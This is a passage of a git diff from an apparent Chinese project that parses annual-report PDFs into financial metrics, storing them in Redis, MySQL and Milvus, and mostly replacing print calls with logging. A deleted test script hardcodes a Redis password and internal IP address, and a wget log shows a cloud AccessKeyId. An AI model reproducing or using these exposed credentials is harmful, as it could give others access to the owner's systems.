|
||||
Recursively iterate the outline tree
|
||||
Find the pages pointed by the outline item
|
||||
and get the assigned physical order id
|
||||
|
||||
Decrement with padding if necessary
|
||||
"""
|
||||
|
||||
if isinstance(root, dict):
|
||||
# print(root)
|
||||
page = root['/Page'].get_object()
|
||||
# print(id(page))
|
||||
t = root['/Title']
|
||||
title = t
|
||||
if isinstance(t, PyPDF2.generic.ByteStringObject):
|
||||
title = t.original_bytes.decode('utf8')
|
||||
title = title.strip()
|
||||
title = title.replace('\n', '')
|
||||
title = title.replace('\r', '')
|
||||
|
||||
page_num = info['all_pages'].get(id(page), 0)
|
||||
if page_num == 0:
|
||||
print('Not found page number for /Page!', page)
|
||||
elif page_num < info['padding']:
|
||||
page_num = 0
|
||||
else:
|
||||
page_num -= info['padding']
|
||||
|
||||
|
||||
# str_val = '%-5d' % page_num
|
||||
# str_val += '\t' * depth
|
||||
# str_val += title + '\t' + '%3d' % page_num
|
||||
# print(str_val)
|
||||
title_array.append({
|
||||
'title': title,
|
||||
'page_num': page_num,
|
||||
'depth': depth
|
||||
})
|
||||
for elem in root:
|
||||
get_tree_pages(elem, info, depth+1,title_array)
|
||||
return title_array
|
||||
|
||||
|
||||
def recursive_numbering(obj, info):
|
||||
"""
|
||||
Recursively iterate through all the pages in order and assign them a physical
|
||||
order number
|
||||
"""
|
||||
# print(id(obj), obj)
|
||||
if obj['/Type'] == '/Page':
|
||||
obj_id = id(obj)
|
||||
if obj_id not in info['all_pages']:
|
||||
info['all_pages'][obj_id] = info['current_page_id']
|
||||
info['current_page_id'] += 1
|
||||
return
|
||||
elif obj['/Type'] == '/Pages':
|
||||
for page in obj['/Kids']:
|
||||
recursive_numbering(page.get_object(), info)
|
||||
|
||||
def get_numbers_between(numbers_between,start, end):
|
||||
# 初始化一个空列表来存储两个数字之间的所有数字
|
||||
|
||||
# 遍历从开始数字到结束数字之间的每个数字
|
||||
for i in range(start, end + 1):
|
||||
# 将每个数字添加到列表中
|
||||
numbers_between.append(i)
|
||||
return numbers_between
|
||||
|
||||
def get_page_end(start, depth, title_array):
|
||||
page_end = -1
|
||||
for i in range(start, len(title_array)):
|
||||
if title_array[i]['depth'] == depth:
|
||||
page_end = title_array[i]['page_num']
|
||||
break
|
||||
return page_end
|
||||
|
||||
def get_file_split(page_count):
|
||||
# 获取 CPU 核数
|
||||
cpu_count = os.cpu_count()
|
||||
if page_count < cpu_count:
|
||||
cpu_count = page_count
|
||||
# 使用 divmod() 函数计算除法结果和余数
|
||||
quotient, remainder = divmod(page_count, cpu_count)
|
||||
table_split_parts = []
|
||||
text_split_parts = []
|
||||
for i in range(cpu_count):
|
||||
start_num = i * quotient
|
||||
if i < cpu_count-1:
|
||||
start_num = i * quotient
|
||||
end_num = start_num+quotient
|
||||
else:
|
||||
end_num = page_count
|
||||
table_split_parts.append(f'{start_num}-{end_num}')
|
||||
text_split_parts.append(get_numbers_between([],start_num, end_num))
|
||||
|
||||
# 返回除法结果和余数
|
||||
return {
|
||||
'table_split_parts': table_split_parts,
|
||||
'text_split_parts': text_split_parts
|
||||
}
|
||||
|
||||
def create_text_outline(pdf_path, file_id):
|
||||
# print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
|
||||
# creating an object
|
||||
with open(pdf_path, 'rb') as file:
|
||||
file_info = {}
|
||||
fileReader = PyPDF2.PdfReader(file)
|
||||
page_count = len(fileReader.pages)
|
||||
|
||||
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
|
||||
redis_client.set(f'page_count_{file_id}', page_count)
|
||||
|
||||
info = {
|
||||
'page_count': page_count,
|
||||
'all_pages': {},
|
||||
'current_page_id': 1,
|
||||
'padding': 0
|
||||
}
|
||||
|
||||
print('Number of pages: %d' % info['page_count'])
|
||||
|
||||
pages = fileReader.trailer['/Root']['/Pages'].get_object()
|
||||
recursive_numbering(pages, info)
|
||||
#for page_num, page in enumerate(pages['/Kids']):
|
||||
# page_obj = page.getObject()
|
||||
# all_pages[id(page_obj)] = page_num + 1 # who starts counting from 0 anyways?
|
||||
title_array = get_tree_pages(fileReader.outline, info, 0, [])
|
||||
|
||||
parent_table_pages_local = {}
|
||||
parent_table_pages_local[file_id] = []
|
||||
print(f'{file_id}:{len(title_array)}')
|
||||
for i in range(len(title_array)):
|
||||
title_obj = title_array[i]
|
||||
title = title_obj['title']
|
||||
#print(f'标题分别是{title}')
|
||||
if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项', title)) >0 :
|
||||
page_start = title_obj['page_num']
|
||||
depth = title_obj['depth']
|
||||
if i < len(title_array) - 1:
|
||||
page_end = title_array[i+1]['page_num']
|
||||
if title_array[i]['depth'] in [1,2]:
|
||||
page_end = get_page_end(i+1, depth, title_array)
|
||||
else:
|
||||
page_end = page_count
|
||||
print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')
|
||||
|
||||
#当标题为母公司财务报表主要项目注释时,最后一页不过滤,避免核心roe指标无法召回
|
||||
if len(re.findall('财务报表主要项目注释', title)) == 0:
|
||||
page_end = page_end - 1
|
||||
# print(title,page_start,page_end)
|
||||
for i in range(page_start, page_end + 1):
|
||||
# 将每个数字添加到列表中
|
||||
parent_table_pages_local[file_id].append(i)
|
||||
file_info['page_count'] = page_count
|
||||
file_info['parent_table_pages'] = parent_table_pages_local[file_id]
|
||||
file_info['split_parts'] = get_file_split(page_count)
|
||||
|
||||
redis_client.close()
|
||||
|
||||
return file_info
|
||||
|
||||
if __name__ == '__main__':
|
||||
import time
|
||||
path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"
|
||||
|
||||
threading.Thread(target=create_text_outline, args=(path,'111')).start()
|
||||
time.sleep(5)
|
||||
threading.Thread(target=create_text_outline, args=(path,'222')).start()
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,3 @@
|
|||
--2024-12-27 11:23:36-- https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
|
||||
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
|
||||
wget: unable to resolve host address ‘financial-report.obs.cn-east-3.myhuaweicloud.com’
|
|
@ -1,154 +1,14 @@
|
|||
#coding=utf-8
|
||||
import sys,ast
|
||||
from pdfminer.high_level import extract_text
|
||||
from pdfminer.pdfparser import PDFParser
|
||||
from pdfminer.pdfdocument import PDFDocument
|
||||
from pdfminer.pdfpage import PDFPage
|
||||
import utils
|
||||
import mysql.connector
|
||||
from pymilvus import connections,MilvusClient
|
||||
import json
|
||||
import db_service
|
||||
import ast
|
||||
# -*- coding: utf-8 -*-
|
||||
import re
|
||||
import numpy as np
|
||||
import config
|
||||
import redis_service
|
||||
from config import MILVUS_CLIENT,MYSQL_HOST,MYSQL_USER,MYSQL_PASSWORD,MYSQL_DB
|
||||
import main
|
||||
import redis
|
||||
|
||||
def measure_config_to_db(conn,cursor):
|
||||
insert_query = '''
|
||||
INSERT INTO measure_config
|
||||
(measure_id, measure_name, ori_measure_id, ori_measure_name)
|
||||
VALUES (%s, %s, %s, %s)
|
||||
'''
|
||||
check_query = '''
|
||||
select ori_measure_id from measure_config
|
||||
'''
|
||||
# 打开文本文件
|
||||
with open('/Users/zhengfei/work/zzb_data/measure_config_all.txt', 'r') as file:
|
||||
# 读取所有行到一个列表中
|
||||
lines = file.readlines()
|
||||
|
||||
# 打印每一行
|
||||
for line in lines:
|
||||
config_list = line.strip().split(',')
|
||||
measure = config_list[0]
|
||||
ori_measure = config_list[1]
|
||||
ori_measure_id = utils.get_md5(ori_measure)
|
||||
# 判断数据库中是否有数据
|
||||
# cursor.execute(check_query.format(ori_measure_id=ori_measure_id))
|
||||
# check_records = cursor.fetchall()
|
||||
# if(len(check_records)) > 0:
|
||||
# continue
|
||||
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
||||
def insert_measure_vector(conn,cursor):
|
||||
|
||||
redis_client = redis.Redis(host='192.168.0.172', port=6379, password='Xgf_redis', db=6)
|
||||
# 执行SQL语句,更新数据
|
||||
select_query = '''
|
||||
SELECT ori_measure_id,ori_measure_name FROM measure_config
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
for record in records:
|
||||
if redis_client.hexists('measure_config', record[0]):
|
||||
measure_vector = redis_client.hget('measure_config', record[0])
|
||||
else:
|
||||
print('新增指标',record[1])
|
||||
vector_obj = utils.embed_with_str(record[1])
|
||||
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
|
||||
|
||||
redis_client.hset('measure_config', record[0], measure_vector)
|
||||
redis_client.close()
|
||||
conn.close()
|
||||
|
||||
def contains_financial_indicators(text):
|
||||
import re
|
||||
# 正则表达式模式匹配千分位格式的数字和百分比
|
||||
pattern = r"\d{1,3}(,\d{3})+(\.\d{1,3})?"
|
||||
|
||||
pattern1 = r"\d+(.\d+)+%?"
|
||||
# 使用 re.search 函数查找匹配项
|
||||
match = re.search(pattern1, text)
|
||||
|
||||
# 如果找到匹配项,返回 True,否则返回 False
|
||||
return bool(match)
|
||||
|
||||
def get_clean_text(text):
|
||||
import re
|
||||
pattern = r"\([^)]*?\)"
|
||||
matches = re.findall(pattern, text)
|
||||
for match in matches:
|
||||
# 使用 re.findall 函数查找括号内的内容中是否包含月份或关键词
|
||||
month_keywords_found = re.search(r"归属于|扣非", match)
|
||||
if not month_keywords_found:
|
||||
# 如果包含,则从文本中删除该部分
|
||||
text = re.sub(pattern,"", text)
|
||||
else:
|
||||
# 如果不包含,删除所有标点符号和中文数字
|
||||
text = re.sub(r"[^\w\s]", "", text)
|
||||
print(text)
|
||||
|
||||
def insert_and_update(conn,cursor,client,parent_table_pages,file_id,path):
|
||||
# #通过向量查询指标
|
||||
db_service.insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,path)
|
||||
|
||||
# #指标归一化处理
|
||||
db_service.update_ori_measure(conn,cursor,file_id)
|
||||
|
||||
def print_measure_data(cursor,client):
|
||||
select_query = '''
|
||||
SELECT ori_measure_name,measure_name,ori_measure_id FROM measure_config
|
||||
where measure_id not in(select distinct measure_id from ori_measure_list where file_id='64')
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
for record in records:
|
||||
ori_measure_name = record[0]
|
||||
measure_name = record[1]
|
||||
ori_measure_id = record[2]
|
||||
measure_vector = redis_service.read_from_redis(ori_measure_id)
|
||||
|
||||
measure_list = ast.literal_eval(measure_vector)
|
||||
data = [measure_list]
|
||||
res = client.search(
|
||||
collection_name="pdf_measure_v4", # Replace with the actual name of your collection
|
||||
# Replace with your query vector
|
||||
data=data,
|
||||
limit=2, # Max. number of search results to return
|
||||
search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
|
||||
output_fields=["measure_name","measure_value","table_num","table_index"],
|
||||
filter = 'file_id == "64"'
|
||||
)
|
||||
vector_str = measure_name+":"+ori_measure_name
|
||||
# Convert the output to a formatted JSON string
|
||||
for i in range(len(res[0])):
|
||||
|
||||
vector_distance = float(res[0][i]["distance"])
|
||||
vector_measure_name = res[0][i]["entity"]["measure_name"]
|
||||
measure_value = res[0][i]["entity"]["measure_value"]
|
||||
table_num = res[0][i]["entity"]["table_num"]
|
||||
table_index = res[0][i]["entity"]["table_index"]
|
||||
table_num_list = [106]
|
||||
print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index))
|
||||
# if vector_distance > 0.89 and table_num not in table_num_list:
|
||||
# print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(0.94))
|
||||
# if vector_distance > distance and table_num not in table_num_list:
|
||||
# print(vector_str +":"+vector_measure_name +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(vector_distance)+":"+str(distance))
|
||||
|
||||
|
||||
list1 = [['2.将重分类进损益的其他综合收益', '', '-135441.46', '58032.20'], ['(1)权益法下可转损益的其他综合收益', '', '', ''], ['(2)其他债权投资公允价值变动', '', '', ''], ['(3)金融资产重分类计入其他综合收益的金额', '', '', ''], ['(4)其他债权投资信用减值准备', '', '', ''], ['(5)现金流量套期储备', '', '', ''], ['(6)外币财务报表折算差额', '', '-135441.46', '58032.20'], ['(7)其他', '', '', ''], ['(二)归属于少数股东的其他综合收益的税后净额', '', '', ''], ['七、综合收益总额', '', '-154059285.14', '15109700.10'], ['(一)归属于母公司所有者的综合收益总额', '', '-153881248.66', '15109700.10'], ['(二)归属于少数股东的综合收益总额', '', '-178036.48', ''], ['八、每股收益:', '八、每股收益:', '八、每股收益:', '八、每股收益:'], ['(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715'], ['(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714']]
|
||||
# 测试代码
|
||||
if __name__ == "__main__":
|
||||
conn = mysql.connector.connect(
|
||||
host=MYSQL_HOST,
|
||||
user=MYSQL_USER,
|
||||
password=MYSQL_PASSWORD,
|
||||
database=MYSQL_DB
|
||||
)
|
||||
cursor = conn.cursor()
|
||||
|
||||
insert_measure_vector(conn,cursor)
|
||||
for lines in list1:
|
||||
line = list(set(lines))
|
||||
print(line)
|
||||
|
||||
|
||||
|
|
@ -7,6 +7,8 @@ from pdfminer.layout import LTTextContainer, LTChar, LTRect, LTFigure
|
|||
import pdfplumber
|
||||
|
||||
import os
|
||||
import logging
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# 创建一个文本提取函数
|
||||
|
||||
|
@ -125,8 +127,8 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
|
|||
upper_side = element.y1
|
||||
# 从表中提取信息
|
||||
table = extract_table(pdf_path, pagenum, table_num)
|
||||
# print('第'+str(pagenum)+'页第'+str(table_num)+'个表格')
|
||||
# print(table)
|
||||
# log.info('第%s页第%s个表格', str(pagenum), str(table_num))
|
||||
# log.info(table)
|
||||
# 将表信息转换为结构化字符串格式
|
||||
table_string = table_converter(table)
|
||||
# 将表字符串追加到列表中
|
||||
|
@ -148,15 +150,15 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
|
|||
first_element = True
|
||||
table_num+=1
|
||||
|
||||
print('第'+str(pagenum)+'部分')
|
||||
print('page_text:')
|
||||
print(page_text)
|
||||
#print('line_format:')
|
||||
#print(line_format)
|
||||
#print('text_from_tables:')
|
||||
#print(text_from_tables)
|
||||
#print('page_content:')
|
||||
#print(page_content)
|
||||
log.info('第%s部分', str(pagenum))
|
||||
log.info('page_text:')
|
||||
log.info(page_text)
|
||||
#log.info('line_format:')
|
||||
#log.info(line_format)
|
||||
#log.info('text_from_tables:')
|
||||
#log.info(text_from_tables)
|
||||
#log.info('page_content:')
|
||||
#log.info(page_content)
|
||||
|
||||
# 创建字典的键
|
||||
dctkey = 'Page_'+str(pagenum)
|
||||
|
@ -171,7 +173,7 @@ pdfFileObj.close()
|
|||
|
||||
# 显示页面内容
|
||||
# result = ''.join(text_per_page['Page_0'][4])
|
||||
# print(result)
|
||||
# log.info(result)
|
||||
|
||||
# result1 = ''.join(text_per_page['Page_1'][4])
|
||||
# print(result1)
|
||||
# log.info(result1)
|
|
@ -4,6 +4,9 @@ import PyPDF2
|
|||
from pdfminer.high_level import extract_pages
|
||||
from pdfminer.layout import LTTextContainer, LTRect
|
||||
import pdfplumber
|
||||
import logging
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
import os
|
||||
|
||||
|
@ -82,7 +85,7 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
|
|||
|
||||
text_obj['page_num'] = pagenum
|
||||
text_obj['text'] = page_text
|
||||
print("pagenum:",pagenum," text:",page_text)
|
||||
log.info("pagenum: %s text: %s", pagenum, page_text)
|
||||
|
||||
# 打印提取的文本
|
||||
# print(page_obj)
|
||||
# log.info(page_obj)
|
|
@ -1,5 +1,7 @@
|
|||
import os
|
||||
import re
|
||||
import logging
|
||||
log = logging.getLogger(__name__)
|
||||
from tqdm import tqdm
|
||||
from pdfminer.pdfparser import PDFParser,PDFDocument
|
||||
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
|
||||
|
@ -24,7 +26,7 @@ def pdf_parse(pdf_path,txt_path):
|
|||
|
||||
#检测文档是否提供txt转换,不提供就忽略
|
||||
if not doc.is_extractable:
|
||||
print(pdf_path)
|
||||
log.info(pdf_path)
|
||||
raise PDFTextExtractionNotAllowed
|
||||
else:
|
||||
#创建PDF,资源管理器,来共享资源
|
||||
|
@ -48,7 +50,7 @@ def pdf_parse(pdf_path,txt_path):
|
|||
if(isinstance(x,LTTextBoxHorizontal)):
|
||||
with open(txt_path,'a') as f:
|
||||
results = x.get_text()
|
||||
# print(results)
|
||||
# log.info(results)
|
||||
f.write(results +"\n")
|
||||
|
||||
|
||||
|
@ -68,5 +70,5 @@ if __name__ == '__main__':
|
|||
txt_path = save_txt_path+txt_name
|
||||
pdf_parse(pdf_path, txt_path)
|
||||
except:
|
||||
print("转换失败:", pdf_name)
|
||||
log.info("转换失败:%s", pdf_name)
|
||||
continue
|
|
@ -4,6 +4,8 @@ import os
|
|||
import json
|
||||
import numpy as np
|
||||
from datetime import datetime
|
||||
import logging
|
||||
logger = logging.getLogger(__name__)
|
||||
# 读取PDF
|
||||
import PyPDF2
|
||||
# 分析PDF的layout,提取文本
|
||||
|
@ -230,7 +232,7 @@ def get_measure_from_llm(user_prompt):
|
|||
llm_measure_list = result.split('\n')
|
||||
return llm_measure_list
|
||||
else:
|
||||
print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
|
||||
logger.error('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
|
||||
response.request_id, response.status_code,
|
||||
response.code, response.message
|
||||
))
|
||||
|
@ -270,7 +272,7 @@ def parse_llm_measure_to_db(measure_info,type,conn,cursor):
|
|||
ori_measure_id = get_md5(ori_measure_name)
|
||||
data_to_insert = (file_id, file_name, type, int(page_num), int(table_index), ori_measure_id, ori_measure_name, ori_measure_value, create_time, create_time)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
print(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")
|
||||
logger.info(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")
|
||||
|
||||
# 提交事务
|
||||
conn.commit()
|
||||
|
@ -300,7 +302,7 @@ def update_ori_measure(conn,cursor):
|
|||
|
||||
if __name__ == "__main__":
|
||||
start_time = datetime.now()
|
||||
print("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))
|
||||
logger.info("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))
|
||||
|
||||
path = "/Users/zhengfei/Desktop/科润智控1.pdf"
|
||||
table_info = get_table_measure(path)
|
||||
|
@ -324,10 +326,10 @@ if __name__ == "__main__":
|
|||
table_index = table_obj['page_num'].split("_")[1]
|
||||
table_measure = ','.join(table_obj['measure_list'])
|
||||
if table_page_num == '3':
|
||||
print(f"第{table_page_num}页表格指标为:{table_measure}")
|
||||
logger.info(f"第{table_page_num}页表格指标为:{table_measure}")
|
||||
table_llm_measure = get_measure_from_llm(table_measure)
|
||||
if table_page_num == '3':
|
||||
print(f"第{table_page_num}页表格llm指标为:{table_llm_measure}")
|
||||
logger.info(f"第{table_page_num}页表格llm指标为:{table_llm_measure}")
|
||||
# table_measure_obj['page_num'] = table_page_num
|
||||
# table_measure_obj['table_index'] = table_index
|
||||
# table_measure_obj['llm_measure'] = table_llm_measure
|
||||
|
@ -352,5 +354,5 @@ if __name__ == "__main__":
|
|||
# parse_llm_measure_to_db(measure_info)
|
||||
# get_measure_from_llm()
|
||||
end_time = datetime.now()
|
||||
print("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
|
||||
logger.info("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
|
||||
#print(pdf_data)
|
|
@ -19,6 +19,8 @@ from pymilvus import MilvusClient
|
|||
#import pdf_title
|
||||
import numpy as np
|
||||
#from multiprocessing import Process
|
||||
import logging
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
|
||||
|
@ -81,9 +83,9 @@ def get_text_content_test(file_path,file_id,pages,tables_range):
|
|||
|
||||
# 记录需要过滤掉的页码
|
||||
if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
|
||||
print('成功识别到了')
|
||||
logger.info('成功识别到了')
|
||||
except Exception as e:
|
||||
print(f"Error processing page {pagenum+1}: {e}")
|
||||
logger.error(f"Error processing page {pagenum+1}: {e}")
|
||||
|
||||
pdf_path = r"combined_v61.pdf"
|
||||
file_id = 1
|
||||
|
|
|
@ -19,6 +19,8 @@ from pymilvus import MilvusClient
|
|||
#import pdf_title
|
||||
import numpy as np
|
||||
#from multiprocessing import Process
|
||||
import logging
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入'
|
||||
#负责表内一旦出现某个字符,整个表丢弃
|
||||
|
@ -202,7 +204,7 @@ tables_range = {}
|
|||
# print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
|
||||
def get_table_range_test(file_path, file_id, pages, tables_range):
|
||||
|
||||
print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
|
||||
logger.info('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
|
||||
start = time.time()
|
||||
|
||||
# conn = mysql.connector.connect(
|
||||
|
@ -295,7 +297,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
|
|||
'table_index' : table_index,
|
||||
'page_num' : page_num,
|
||||
})
|
||||
print(f"tables_range的值是{tables_range}")
|
||||
logger.debug(f"tables_range的值是{tables_range}")
|
||||
|
||||
# db_service.insert_pdf_parse_process({
|
||||
# 'file_id': file_id,
|
||||
|
@ -319,7 +321,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
|
|||
# redis_client.close()
|
||||
|
||||
end = time.time()
|
||||
print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
|
||||
logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
|
||||
|
||||
|
||||
get_table_range_test(file_path, file_id, pages, tables_range)
|
||||
|
|
|
@ -10,6 +10,12 @@ import requests
|
|||
import config
|
||||
import numpy as np
|
||||
from docx2pdf import convert
|
||||
from config import api_key
|
||||
import logging
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
dashscope.api_key = api_key
|
||||
|
||||
|
||||
def get_md5(str):
|
||||
import hashlib
|
||||
|
@ -20,25 +26,27 @@ def get_md5(str):
|
|||
def embed_with_str(input):
|
||||
retry = 0
|
||||
max_retry = 5
|
||||
t = 0.1
|
||||
t = 0.2
|
||||
while retry < max_retry:
|
||||
#阿里接口限流
|
||||
time.sleep(t)
|
||||
# time.sleep(t)
|
||||
#阿里接口限流
|
||||
resp = dashscope.TextEmbedding.call(
|
||||
model=dashscope.TextEmbedding.Models.text_embedding_v2,
|
||||
input=input)
|
||||
if resp.status_code == HTTPStatus.OK:
|
||||
return resp
|
||||
elif resp.status_code == 429:
|
||||
print(f'触发限流,等待{t}秒后重试')
|
||||
logger.info(f'触发限流,等待{t}秒后重试')
|
||||
retry += 1
|
||||
t+=0.1
|
||||
else:
|
||||
print(f'请求失败,状态码:{resp.status_code}')
|
||||
logger.error(f'请求失败,状态码:{resp.status_code}')
|
||||
return None
|
||||
print('重试超过上限')
|
||||
logger.error('重试超过上限')
|
||||
return None
|
||||
|
||||
|
||||
|
||||
#如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。
|
||||
#如果存在季度关键词,就将括号内容替换为季度
|
||||
#如果存在‘±’,就将括号内容替换为同期增减
|
||||
|
@ -89,7 +97,7 @@ def get_clean_text(text):
|
|||
return pattern.sub(lambda match: replacements[match.group(0)], text)
|
||||
text = replace_all(text, replacement_dict)
|
||||
#单独出现12月31日时,就剔除掉
|
||||
pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
|
||||
pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
|
||||
text = re.sub(pattern_year, '', text)
|
||||
|
||||
pattern = r"\([^)]*\)|\([^)]*\)" # 增加英文括号的匹配
|
||||
|
@ -137,11 +145,11 @@ def convert_docx_to_pdf(file_path):
|
|||
try:
|
||||
# 执行转换
|
||||
convert(file_path, pdf_path)
|
||||
print(f"转换成功: {pdf_path}")
|
||||
logger.info(f"转换成功: {pdf_path}")
|
||||
except Exception as e:
|
||||
print(f"转换失败: {e}")
|
||||
logger.error(f"转换失败: {e}")
|
||||
else:
|
||||
print("错误: 文件必须是 .docx 格式。")
|
||||
logger.error("错误: 文件必须是 .docx 格式。")
|
||||
|
||||
def save_pdf_from_url(url, file_path):
|
||||
from urllib.parse import unquote
|
||||
|
@ -163,10 +171,10 @@ def save_pdf_from_url(url, file_path):
|
|||
|
||||
with open(local_file_path, 'wb') as file:
|
||||
file.write(response.content)
|
||||
print(f"文件已下载到 {local_file_path}")
|
||||
logger.info(f"文件已下载到 {local_file_path}")
|
||||
else:
|
||||
# 文件下载失败
|
||||
print(f"无法下载文件,状态码:{response.status_code}")
|
||||
logger.error(f"无法下载文件,状态码:{response.status_code}")
|
||||
|
||||
return local_file_path
|
||||
|
||||
|
@ -252,7 +260,7 @@ def get_season_flag(text):
|
|||
return '0'
|
||||
|
||||
def get_percent_flag(text):
|
||||
percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|变动比例|本年度比上年度增减|增减'
|
||||
percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|本期期末金额较上期期末变动比例'
|
||||
if len(re.findall(percent_word, text)) > 0:
|
||||
return '1'
|
||||
else:
|
||||
|
@ -293,40 +301,7 @@ def check_black_list(meta_measure, pdf_measure, black_array):
|
|||
|
||||
def check_black_list_old(meta_measure,pdf_measure):
|
||||
# 判断指标名是否包含黑名单词
|
||||
#black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
|
||||
black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
|
||||
,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
|
||||
,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
|
||||
,'扣非净利润:净资产,净利率,年度公司'
|
||||
,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
|
||||
,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
|
||||
,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
|
||||
,'非经常性损益:扣除非经常性损益'
|
||||
,'基本每股收益:稀释每股收益,发行新股'
|
||||
,'稀释每股收益:基本每股收益,发行新股'
|
||||
,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
|
||||
,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
|
||||
,'应付账款:应收账款,年以上,内,至,到'
|
||||
,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
|
||||
,'研发投入:比例,比率,占比,费用,占'
|
||||
,'资本化研发投入:比例,比率,占比,费用,占'
|
||||
,'资本化研发投入占比:金额,费用'
|
||||
,'研发投入占营业收入比例:金额,费用'
|
||||
,'上年年末:1月1日'
|
||||
,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
|
||||
,'期扣非加权平均净资产收益率:同比,年化,每股'
|
||||
,'加权平均净资产收益率同比变动:年化,每股'
|
||||
,'研发费用:制造,投入,直接,管理'
|
||||
,'应收账款:1-2年','货币资金:在途'
|
||||
,'当期:2023年1-6月,调整后'
|
||||
,'营业成本:营业总成本'
|
||||
,'长期借债:年内到期','研发投入:直接'
|
||||
,'第一季度:第二季度,第三季度,第四季度'
|
||||
,'第二季度:第一季度,第三季度,第四季度'
|
||||
,'第三季度:第二季度,第一季度,第四季度'
|
||||
,'第四季度:第二季度,第三季度,第一季度'
|
||||
,'研发费用:研发支出,研发投入','存货:跌价准备'
|
||||
,'费用:日常,付现','固定资产:改良,补助,投资']
|
||||
